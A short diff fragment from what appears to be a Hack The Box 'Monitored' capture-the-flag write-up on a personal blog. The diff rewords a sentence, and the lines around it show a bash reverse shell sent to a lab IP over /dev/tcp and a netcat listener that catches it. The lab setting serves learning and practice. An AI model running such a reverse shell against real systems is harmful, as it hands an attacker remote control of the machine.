CSpanias/cspanias.github.io/_posts/2024-01-16-HTB - Monitored.md

 /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.11/1337 0>&1'
 ```

-If we did everything right and we execute the check command we should catch our reverse shell:
+If we did everything according to the documentation, and we then execute the check command, we should be able to catch our reverse shell:

 ```bash
 $ sudo nc -lvnp 1337